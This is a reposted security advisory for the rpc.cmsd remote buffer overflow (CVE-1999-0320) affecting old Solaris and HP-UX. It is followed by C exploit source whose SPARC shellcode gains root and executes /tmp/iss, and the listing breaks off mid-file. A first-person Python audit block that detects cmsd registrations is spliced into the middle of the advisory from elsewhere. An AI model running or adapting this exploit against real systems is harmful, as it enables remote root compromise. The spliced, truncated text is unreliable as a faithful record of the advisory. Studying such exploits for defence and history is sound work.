Multiple vendors' rpc.cmsd remote buffer overflow vulnerability

2008-04-09 04:33:52 Source: Internet


Release date: 1999-07-13
Update date: 1999-07-13

Affected systems:
Sun Solaris rpc.cmsd
- HP HP-UX 11.0
- HP HP-UX 10.30
- HP HP-UX 10.20
- Sun Solaris 7.0
- Sun Solaris 2.6
- Sun Solaris 2.5.1
- Sun Solaris 2.5
- Sun Solaris 2.4
- Sun Solaris 2.3
- Sun SunOS 4.1.4
- Sun SunOS 4.1.3_U1
- Sun SunOS 4.1.3c
- Sun SunOS 4.1.3
Description:
BUGTRAQ ID: 524
CVE(CAN) ID: CVE-1999-0320

rpc.cmsd (Calendar Manager Service daemon) is an RPC daemon that manages the appointment-scheduling database. It is a component of the CDE desktop (Common Desktop Environment) and runs by default on Solaris and several other Unix systems.

rpc.cmsd's implementation contains a buffer overflow. A remote or local attacker can exploit it to execute arbitrary commands with root privileges.
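As an added defender-side check, not part of the original advisory or of the exploit listed below: a small Python audit that parses `rpcinfo -p` output and `/etc/inetd.conf` for rpc.cmsd, the two places to inspect before and after disabling the service. The RPC program number 100068 and both sample inputs are assumptions I constructed; verify the number against the host's /etc/rpc.

```python
import re

# Constructed sample of `rpcinfo -p <host>` output from a host that still
# registers the CDE calendar manager (name "cmsd"); not a real capture.
SAMPLE_RPCINFO = """\
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    3   udp    111  portmapper
    100068    2   udp  32773  cmsd
    100068    3   udp  32773  cmsd
    100068    4   udp  32773  cmsd
    100068    5   udp  32773  cmsd
    100021    1   udp   4045  nlockmgr
"""

# Constructed sample /etc/inetd.conf lines in Solaris RPC-service style.
SAMPLE_INETD = """\
100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind
100068/2-5 dgram rpc/udp wait root /usr/dt/bin/rpc.cmsd rpc.cmsd
#100083/1 tli rpc/tcp wait root /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverd
"""

CMSD_PROG = 100068  # assumed program number of rpc.cmsd; check /etc/rpc


def cmsd_registrations(rpcinfo_text):
    """Return (version, proto, port) for every cmsd entry in rpcinfo -p output."""
    found = []
    for line in rpcinfo_text.splitlines():
        fields = line.split()
        # Skip the header line and anything that is not a numeric program entry.
        if len(fields) < 4 or not fields[0].isdigit():
            continue
        prog, vers, proto, port = int(fields[0]), int(fields[1]), fields[2], int(fields[3])
        name = fields[4] if len(fields) > 4 else ""
        if prog == CMSD_PROG or name == "cmsd":
            found.append((vers, proto, port))
    return found


def active_cmsd_inetd_lines(inetd_text):
    """Return uncommented inetd.conf lines that would still launch rpc.cmsd."""
    by_number = re.compile(r"^\s*%d/" % CMSD_PROG)
    return [l for l in inetd_text.splitlines()
            if not l.lstrip().startswith("#")
            and (by_number.match(l) or "rpc.cmsd" in l)]
```

A host is mitigated only when both functions return empty lists: the inetd line commented out and the portmapper no longer advertising program 100068 after inetd is restarted.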

<*Links: http://www.iss.net/security_center/static/2345.php
ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.12
http://www.attrition.org/security/advisory/hpalert/hpux.00102
http://www.cert.org/advisories/CA-1999-08.html
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/188&type=0&nav=sec.sba
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear the risk themselves!

/*
*
* cmsd warez
*
* executes /tmp/iss
*
* gcc -o c c.c -lrpcsvc -lnsl -lsocket
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <arpa/inet.h>

char c0de[]=
"\x90\x08\x3f\xff" /* and %g0, -1, %o0 - 0 in o0 */
"\x82\x10\x20\x8d" /* mov 0x8d, %g1 - 0x8d==141==SYS_seteuid in g1 */
"\x91\xd0\x20\x08" /* ta 8 - seteuid(0); */
"\x90\x08\x3f\xff" /* and %g0, -1, %o0 - 0 in o0 */
"\x82\x10\x20\x17" /* mov 0x17, %g1 - 0x17==23==SYS_setuid in g1 */
"\x91\xd0\x20\x08" /* ta 8 - setuid(0); */
"\x2d\x0b\xdd\x1b" /* sethi %hi(0x2f746c00), %l6 */
"\xac\x15\xa1\x70" /* or %l6, 0x170, %l6 - "/tmp" */
"\x2f\x0b\xda\x5c" /* sethi %hi(0x2f697000), %l7 */
"\xae\x15\xe3\x73" /* or %l7, 0x373, %l7 - "/iss" */
"\x90\x0b\x80\x0e" /* and %sp, %sp, %o0 - addr of "/tmp/iss" in o0 */
"\x92\x03\xa0\x0c" /* add %sp, 0xc, %o1 - addr of ptr->"/tmp/iss" o1 */
"\x94\x1a\x80\x0a" /* xor %o2, %o2, %o2 - 0 in o2 (envp) */
"\x9c\x03\xa0\x14" /* add %sp, 0x14, %sp - (0x14==20) give space */
"\xec\x3b\xbf\xec" /* std %l6, [ %sp -20 ] - store "/tmp/iss" */
"\xc0\x23\xbf\xf4" /* clr [ %sp -12 ] - null term "/tmp/iss" */
"\xdc\x23\xbf\xf8" /* st %sp, [ %sp -8 ] - make ptr->"/tmp/iss" */
"\xc0\x23\xbf\xfc" /* clr [ %sp -4 ] - null term ptr array (argv) */
"\x82\x10\x20\x3b" /* mov 0x3b, %g1 - 0x3b==59==SYS_execve in g1 */
"\x91\xd0\x20\x08" /* ta 8 - execve(&"/tmp/iss",&(ptr->"/tmp/iss"),0) */
"\x90\x1b\xc0\x0f" /* xor %o7, %o7, %o0 - 0 in o0 */
"\x82\x10\x20\x01" /* mov 1, %g1 - 1==SYS_exit in g1 */
"\x91\xd0\x20\x08"; /* ta 8 - exit(0) */

#define X_OFFSET 5500
#define RW_OFFSET 800
#define NOPS 700
#define ALIGN (2000+sizeof(unsigned long)*7)
#define REG_W_SIZ 64
#define PRE_RET (REG_W_SIZ-3*sizeof(unsigned long))
#define OFBUFSIZ (BUFSIZ+REG_W_SIZ+NOPS+sizeof(c0de)-sizeof(unsigned long))

char cname[] = "root@ISS";

/* ----- rpcgen ----- */

/*
* Please do not edit this file.
* It was generated using rpcgen.
*/

#ifndef _RTABLE4_H_RPCGEN
#define _RTABLE4_H_RPCGEN

#include <rpc/rpc.h>

typedef char *Buffer;

enum Transaction {
add = 0,
cm_remove = 1
};
typedef enum Transaction Transaction;

enum Interval {
single = 0,
daily = 1,
weekly = 2,
biweekly = 3,
monthly = 4,
yearly = 5,
nthWeekday = 6,
everyNthDay = 7,
everyNthWeek = 8,
everyNthMonth = 9,
otherPeriod = 10,
monThruFri = 11,
monWedFri = 12,
tueThur = 13,
daysOfWeek = 14
